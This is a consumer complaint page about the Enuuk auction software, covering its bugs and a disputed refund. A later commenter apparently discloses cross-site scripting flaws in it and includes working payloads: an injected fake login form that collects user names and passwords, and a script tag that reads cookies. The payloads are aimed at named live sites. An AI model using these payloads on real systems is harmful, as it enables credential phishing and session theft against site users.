• Report: #496928

Complaint Review: Enuuk

Featured Ripoff Reports

Past Featured Reports

Ripoff Report Corporate Advocacy Program
Help support Ripoff Report. Donate today.
Ripoff Reports Legal Ads

Ripoff Report Legal Directory

Thank You

Read how Ripoff Report saves consumers millions.

  • Submitted: Friday, September 18, 2009
  • Last Posting: Sunday, November 22, 2009
  • Reported By: The Numismatic Dealers Den — USA
Enuuk
www.numismaticdealers.net Internet United States of America

Enuuk PhpAuction Beware of the product Enuuk (auction software). The program is frought with bugs and the vendor will not refund your money unless you give them your domain name Internet

*Consumer Comment: Bugs on ENUUK


1Author 1Consumer 0Employee/Owner

Respond to this Report

  • Respond to this report!
    What's this?
  • Also a victim?
    What's this?
  • Arbitrate
    Set The Record Straight!
  • Repair Your Reputation
    ...the right way!
    Corporate Advocacy Program

In August my organization spend $945 to purchase Enuuk- what was advertised as a premier auction software soultion. From the day the software was istalled, there was nothing but bugs- big bugs. For instance, the software did not show the correct time remaining and members consistently got fatal error messages. The vendor then insisted that they upgrade it to the new version (which they released the day after I sent it 5 bugs notices). They upgraded it and still more bugs showed. They even send me an email saying another version was avialable and provided insutrctions on upgrading. That upgrade failed and more bugs showed. When I told them I had enough and I wated my money back, they told me that these bugs were my problem and they won't give me my money back unless I gave up my domain name- even though in the beginning we agreed that they would not ask for my domain name if the product was faulty. See www.enuuk.org for a complete list of the bugs that I have found. I have since needed resort calling and asking my credit card company to help. I am writing this in hopes others don't fall into the trap. They are either in Mexico or Spain so I have little other recourse other than that.

This report was posted on Ripoff Report on 9/18/2009 10:42:03 AM and is a permanent record located here: http://www.ripoffreport.com/computer-software/enuuk/enuuk-phpauction-beware-of-th-db8ec.htm.

Ripoff Report has an exclusive license to this report. It may not be copied without the written permission of Ripoff Report.

Click Here to read other Ripoff Reports on Enuuk

Search for additional reports

If you would like to see more Rip-off Reports on this company/individual, search here:

Search Tips
Report & Rebuttal
Respond to this report!
What's this?
Also a victim?
What's this?
Repair Your Reputation!
What's this?
Arbitrate
Remove Reports?
No! Better yet! Arbitrate to set the record straight!
REBUTTALS & REPLIES:
1Author 1Consumer 0Employee/Owner
Updates & Rebuttals

#1 Consumer Comment

Bugs on ENUUK

AUTHOR: roboteto - (United States of America)

SUBMITTED: Sunday, November 22, 2009

Roboteto Security Advisor's
=====================

XSS Attacks on ENUUK V 1.5
Input Validation Error on ENUUK, Cross Site Scripting on any auction.

Please see the demo on Sunday 22 de November
http://www.phpauction.net/enuuk-auction-platform/offer/details/8  (alternate form validator)
http://www.phpauction.net/enuuk-auction-platform/offer/details/7  (document.cookie)
http://www.phpauction.net/enuuk-auction-platform/  (alerts on nickname)

You can introduce any HTML tag on textareas (before disabling Javascript option on navigator).

You can put a form like this:
A hack to this website and all websites with ENUUK (without quotes):

<div>A hack to this website and all websites with ENUUK:

<div width=800 height=400 style=background-color:#faa>
<h3>To bid please, fill this form (please, be sure that is your password)</h3><br>
<form name=form method=get class=header-login action=http://www.phpauction.net/enuuk-auction-platform/offer/edit/8>
 User: <input name=login type=text><br><br>
 Password <input name=passwd type=password><br><br>
  <a class=button href=javascript:void() onclick=document.form.submit();>Bid this! <img src=themes/default/img/buttonArrow.gif></a><br><br>

</form>
</div>
You can introduce on any input form a <script> tag, that allows you to javascript injection:

  Introduce your name: roboteto<script>alert(document.cookie);</script>

Author:
 These vulnerabilities have been found and released without any damages for ENUUK or its customers by
  Roboteto.
  You can find me at roboteto[AT|NOSPAM]hotmail[DOT|NOTSPAM]es for securing your sites.


Sincerely,

  Roboteto.

Respond to this report!
What's this?
Ripoff Report Verified Safe

Advertisers above have met our
strict standards for business conduct.

Ripoff Report Legal Directory